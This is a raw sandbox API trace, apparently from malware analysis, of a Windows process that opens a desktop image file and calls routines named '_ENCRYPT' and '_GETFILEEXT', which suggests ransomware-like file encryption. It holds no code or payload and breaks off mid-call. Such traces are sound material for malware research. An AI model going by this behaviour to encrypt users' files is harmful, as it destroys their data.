RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0076.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.880] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0076.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.881] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76e408 [0076.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76e408, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0076.881] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dbnuaeypilbfpd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0076.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0076.882] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.882] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 1 [0076.882] TranslateMessage (lpMsg=0x61eeb4) returned 0 [0076.882] DispatchMessageW (lpMsg=0x61eeb4) returned 0x0 [0076.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0076.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0076.882] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61e550) returned 1 [0076.883] KillTimer (hWnd=0x4011e, uIDEvent=0x1) returned 1 [0076.883] SetTimer (hWnd=0x4011e, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0076.883] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0076.883] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.883] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.883] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e0a8 [0076.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e0a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.884] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.884] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0076.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0076.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0076.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0076.885] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.885] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0076.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0076.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690740 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0076.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e630 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0076.885] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.886] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.886] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.887] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.887] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.887] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.887] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186c4af0, ftCreationTime.dwHighDateTime=0x1d5dd9a, ftLastAccessTime.dwLowDateTime=0x2cc965b0, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0x2cc965b0, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0xfb13, dwReserved0=0x0, dwReserved1=0x657690, cFileName="8dBnuAEyPilbFpD.gif", cAlternateFileName="8DBNUA~1.GIF")) returned 0x6b89b8 [0076.888] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.888] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.888] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186c4af0, ftCreationTime.dwHighDateTime=0x1d5dd9a, ftLastAccessTime.dwLowDateTime=0x2cc965b0, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0x2cc965b0, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0xfb13, dwReserved0=0x0, dwReserved1=0x657690, cFileName="8dBnuAEyPilbFpD.gif", cAlternateFileName="8DBNUA~1.GIF")) returned 0x6b89b8 [0076.888] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0076.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.889] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, 